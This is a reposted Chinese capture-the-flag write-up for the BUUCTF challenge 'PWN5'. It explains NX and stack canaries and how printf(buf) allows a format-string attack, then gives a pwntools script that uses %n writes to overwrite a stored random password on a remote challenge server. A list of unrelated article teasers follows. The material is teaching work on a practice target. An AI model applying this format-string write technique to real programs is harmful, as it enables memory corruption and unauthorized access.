BUUCTF-PWN-[第五空间2019 决赛]PWN5

news/2025/2/24 9:10:31/文章来源:https://www.cnblogs.com/ylin07/p/18718006

学到一个新的做法,在每次分析前,先使用checksec来检查程序是否有特定的保护

这里我们可以看到程序开启了NX和Canary保护:

  • NX保护,实际上就是将数据段,设为仅对代码段可见,操作者无法对数据段中的内容进行修改,也不能被执行
  • Canary保护,会在栈帧中(一般是返回地址之前)插入一个检查值,从而验证,栈帧是否被使用栈溢出攻击,如果是,则终止运行

我们需要根据checksec给出的信息,来制定一个新的攻击策略,我们将目光放到源程序上面:

我们注意到两条指令read(0, buf, 0x63u);printf(buf);,这意味着printf的参数是被我们写入缓冲区的内容所决定的。因此我们可以对它使用格式化字符串漏洞攻击

关于格式化字符串漏洞,网上有很多讲的很清楚的。所以在此我就简单说明记录一下:
我们知道printf函数是一个不定参数的函数,正常的使用,需要一个格式化字符对应相应的变量。但是在实际应用中,我们也可以不这么做,不妨试试 printf("%p %p %p");即使我们不传入参数,也会打印出其他的内容。这是因为printf在接受格式化字符之后,会向下读取。但是会得到一些相关的内容,通过这种方式,可以实现对其的攻击

+-------------------+
| 返回地址 (main)   |
+-------------------+
| 旧栈帧指针 (ebp)  |
+-------------------+
| 局部变量 (input)  |  <- 存储 "%x %x %x %x"
+-------------------+
| 格式化字符串参数  |  <- printf 的第一个参数(指向 input)
+-------------------+
| 栈中的数据1       |  <- 被 %x 读取
| 栈中的数据2       |  <- 被 %x 读取
| 栈中的数据3       |  <- 被 %x 读取
| 栈中的数据4       |  <- 被 %x 读取
+-------------------+

而在这里我们有一个格式化字符串参数%n,他的作用是读取前面字符的数量,并写入给定的地址。利用这一点我们可以用它来实现我们的格式化字符串漏洞攻击

+-------------------+
| 返回地址 (main)   |
+-------------------+
| 旧栈帧指针 (ebp)  |
+-------------------+
| 局部变量 (input)  |  <- 存储 "\x78\x56\x34\x12%n"
+-------------------+
| 格式化字符串参数  |  <- printf 的第一个参数(指向 input)
+-------------------+
| 栈中的数据1       |  <- 被 %n 写入
+-------------------+

而这道题中,我们知道随机生成的密码被存放在&dword_804C044中的四个字节中,不过我们无法得到里面的内容,但是我们可以利用格式化字符串漏洞攻击,从而将里面的内容改写
首先我们呢需要清楚我们输入的字符在栈中的位置,因此我们传入一个"AAAA %p %p %p %p %p %p %p %p %p %p %p %p %p %p %p"来看一看回显

我们注意到0x41414141是我们传入的数据,也就是说我们传入的数据在栈上的第十个,也就是说如果我们目标地址的偏移地址是10。也就是说,我们要调用的目标地址在,10,11,12,13上面
我们可以利用"%数字$n"的方法来实现偏移定位
现在我们可以写出自己的payload,来实现对其的覆盖,现在随机密码被我们覆盖为了四个16,也就是说此时密码为0x10101010

from pwn import *
p = remote("node5.buuoj.cn",29404)
payload = p32(0x804C044)+p32(0x804C045)+p32(0x804C046)+p32(0x804C047)
payload += "%10$n%11$n%12$n%13$n"
p.sendline(payload)
psw = str(0x10101010)
p.sendline(psw)
p.interactive()

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/884685.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

vxe-table grid 4.11+ 和 3.13+ 使用展开行详解

vxe-table 使用展开行的两种模式详解, vxe-table 4.11+ v3.13+展开内容支持两种方式,固定和内嵌,其中默认的固定模式是全功能的,内嵌模式不支持虚拟滚动。 官网:https://vxetable.cn 固定模式固定模式,渲染性能最好,支持冻结列、虚拟滚动和单元格选择等 <template>…

【后端】简化部署交互设计方案V2

一、部署流程 1.1 按需获取安装包 获取安装包和校验码,并校验安装包的完整性。 1.2 配置安装和升级部署 解压安装包,配置必要的参数(例如IP和主机名等),然后执行安装工具进行安装,如果授权码有误,则会退出安装。安装的时候会根据当前已经安装的版本情况,让用户选择升级…

【后端】简化部署设计方案V2——技术实现方案

一、安装部署核心内容包的结构 部署核心内容包包含了对操作系统的优化、中间件的安装配置和子平台的安装配置等类型。 1.1 现有交互式部署工具V1的小组件部署结构 目前的交互式部署工具V1进行细化的部署工作,V1工具为每个组件定义了完整的部署逻辑,同时V1工具也为每一个可变参…

最大连续和(单调队列dp)

这道题对取最大值的地方有要求,要先取最大值再入队

Mysql之B树

B-树 B-树(B树或B_树),这里的 B 表示 balance( 平衡的意思),B-树是一种多路自平衡的搜索树(B树是一颗多路平衡查找树) 它类似普通的平衡二叉树,不同的一点是B-树允许每个节点有更多的子节点。下图是 B-树的简化图。B-树有如下特点所有键值分布在整颗树中(索引值和具体dat…

Svelte 最新中文文档翻译(10)—— use: 与 Actions

前言 Svelte,一个非常“有趣”、用起来“很爽”的前端框架。从 Svelte 诞生之初,就备受开发者的喜爱,根据统计,从 2019 年到 2024 年,连续 6 年一直是开发者最感兴趣的前端框架 No.1:Svelte 以其独特的编译时优化机制著称,具有轻量级、高性能、易上手等特性,非常适合构…

如何在啥也不懂的情况下将你的公众号接入DeepSeek或其它大模型

本文详细介绍了零基础用户如何借助AI工具将微信公众号接入DeepSeek等大模型实现智能回复的全流程。首先通过AI问答确定开源项目chatgpt-on-wechat,利用豆包AI分析项目结构后选择Docker部署方案。重点讲解了在Ubuntu系统配置国内镜像安装Docker、编写含中文注释的docker-compos…

rust学习十八.1、RUST的OOP和简单示例

很可惜,出于一些理由,rust抛弃了OOP的核心特性之一:继承 其中一个理由应该是至关重要的,但是解释的比较模糊:继承增加了复杂性的确,继承会让rust编译器变得更加复杂。rust编译器虽然足够体贴,但是它偏慢的编译速度也是很多人所吐槽的。 在我对rust编译了解更多之前,我对…

【后端】简化部署设计方案——内层设计方案

根据《简化部署设计方案V2》的内容,内层部署需要提供的 .sh 脚本应覆盖部署流程的各个阶段,确保组件能够顺利安装、配置、启动、检查状态,并支持升级和卸载。 一、 部署某组件所需的内层结构 左侧是约定的内层结构,右侧的其他部署的内容物,按需存放即可。1.1 scripts目录:…

H3C CX8028 GPFS并行文件系统全闪存储配置案例

H3C华三CX8028使用IBM的GPFS商业授权的一款全闪存储设备。本案中,客户机服务器与存储服务器均搭配双口200G网卡 ,配合200G的ROCE网络搭建集群。 GPRS文件系统中,存储集群不光需要把存储服务器组织在一起,客户机也需要在集群中声明身份,参与到集群之中,这并不像传统的集中…

【kali】在Kali Linux中安装Navicat17

Navicat 是笔者最喜欢的一款专业的数据库管理工具,不仅支持多种数据库类型,而且它提供了直观的用户界面和丰富的功能,帮助用户轻松管理和操作数据库,提高工作效率。 通过,Navicat我们是在Windows环境中部署的。本文以KALI为例,讲解如何在Linux环境中部署。 首先,我们从官…

URL 生成网站截图 API 数据接口

URL 生成网站截图 API 数据接口 网站工具 / 截图 高效生成网页截图 生成网页截图 / 图片输出。1. 产品功能支持全页截图和视窗截图; 支持自定义截图尺寸; 兼容移动设备截图; 支持暗黑模式截图; 固定参数请求,可以得到最新的站点截图; 快速高效的截图生成; 全接口支持 HT…